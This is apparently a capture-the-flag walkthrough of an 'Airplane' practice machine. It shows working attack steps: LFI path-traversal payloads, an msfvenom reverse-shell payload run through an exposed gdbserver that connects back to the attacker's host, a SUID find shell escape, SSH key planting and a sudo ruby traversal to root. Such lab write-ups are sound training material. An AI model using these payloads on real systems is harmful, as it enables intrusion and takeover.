Airplane
Are you ready to fly?
Steps
- Started out with an nmap scan
nmap -sV 10.10.101.33 -v
- Got the ports
22
and8000
, ssh and http - Navigating to
10.10.101.33:8000
, I got redirected toairplane.thm
- I added this to my host file for DNS resolution with:
sudo sh -c "echo '10.10.101.33 airplane.thm' >> /etc/hosts"
- Navigating to the page, I found the page file specified with a page parameter ->
http://airplane.thm:8000/?page=index.html
- After checking source to make sure I didn’t miss anything else, I modified the file path to grab
/etc/passwd
http://airplane.thm:8000/?page=/../../../../etc/passwd
- Easy LFI with no filters <333
- From the file I found two users:
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
hudson:x:1001:1001::/home/hudson:/bin/bash
- I tried to use the same path traversal to read potential
user.txt
files in the home folders, but all I could find was a.bashrc
file under hudsons directory (also I checked for ssh keys (/.ssh/id_rsa
), there were none) - One interesting thing is the
carlos,,,
section of carlos’s line the in the /etc/passwd file - This is the
GECOS
section, and the following commas just mean that phone number, email, etc parameters are empty - So relatively useless </3 (but hey new info to me)
- I tried running
hydra
to bruteforcessh
with the new usernames, but I didn’t have much luck - Going back to the site itself, I decided to run a scan on all ports
-p- -T5
to see if there were any other processes I missed - From this I found port
6048
PORT STATE SERVICE VERSION
6048/tcp open x11?
- Ok strange
- My only guess was trying to find out what processes were running by checking files manually
- All of this info is in the
/proc
directory - Most
/proc
subdirectories are PIDs (numbers) so automating requests shouldn’t be too difficult - So I wrote a VERY barebones python script
import requests
for pid in range(1, 1001):
url = f"http://airplane.thm:8000/?page=/../../../../proc/{pid}/cmdline"
try:
res = requests.get(url, timeout=1)
print(pid, res.text)
except requests.exceptions.RequestException as e:
print(f"Error fetching PID {pid}: {e}")
- Took about 5000000 years to run but it worked!
- Interesting results:
374 avahi-daemon: running [airplane.local]
529 /usr/bin/gdbserver0.0.0.0:6048airplane
- Looking into
gdbserver
└─$ searchsploit gdbserver
------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------- ---------------------------------
GNU gdbserver 9.2 - Remote Command Execution (RC | linux/remote/50539.py
------------------------------------------------- ---------------------------------
Shellcodes: No Results
- I used metasploit to exploit gdbserver (reference: http://book.hacktricks.xyz/network-services-pentesting/pentesting-remote-gdbserver)
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.2.13.251 LPORT=7777 PrependFork=true -f elf -o exploit.elf
- Make it executable with
chmod +x
and run it withgdb exploit.elf
- Then on gdb I ran
target extended-remote 10.10.101.33:6048
- Set up a netcat listener on port
7777
(or wtv you choose) then transfer over the shell
(gdb) remote put exploit.elf /tmp/exploit.elf
(gdb) set remote exec-file /tmp/exploit.elf
(gdb) run
└─$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.2.13.251] from (UNKNOWN) [10.10.166.15] 39078
whoami
hudson
- Stabilize the shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
- There nothing in hudsons dir so we have to move to carlos
- No sudo -l (because no password) so I checked binary perms first
/usr/bin/find
showed up which is exploitable (http://gtfobins.github.io/gtfobins/find/)find . -exec /bin/sh -p \; -quit
- From there navigate to carlos and grab user.txt
- Next privilege escalation
- To ssh as carlos:
# host machine
ssh-keygen
# rev shell
echo "your public key" >> /home/carlos/.ssh/authorized_keys
ssh -i
with your private key file- Running
sudo -l
carlos@airplane:~$ sudo -l
Matching Defaults entries for carlos on airplane:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User carlos may run the following commands on airplane:
(ALL) NOPASSWD: /usr/bin/ruby /root/*.rb
- gtfobins gives this command
ruby -e 'exec "/bin/sh"'
but since we can only run ruby files in the root directory there has to be a workaround - File traversal! (kinda)
carlos@airplane:~$ echo 'exec "/bin/sh"' >> /tmp/test.rb
carlos@airplane:~$ sudo ruby /root/../tmp/test.rb
# whoami
root
- Done!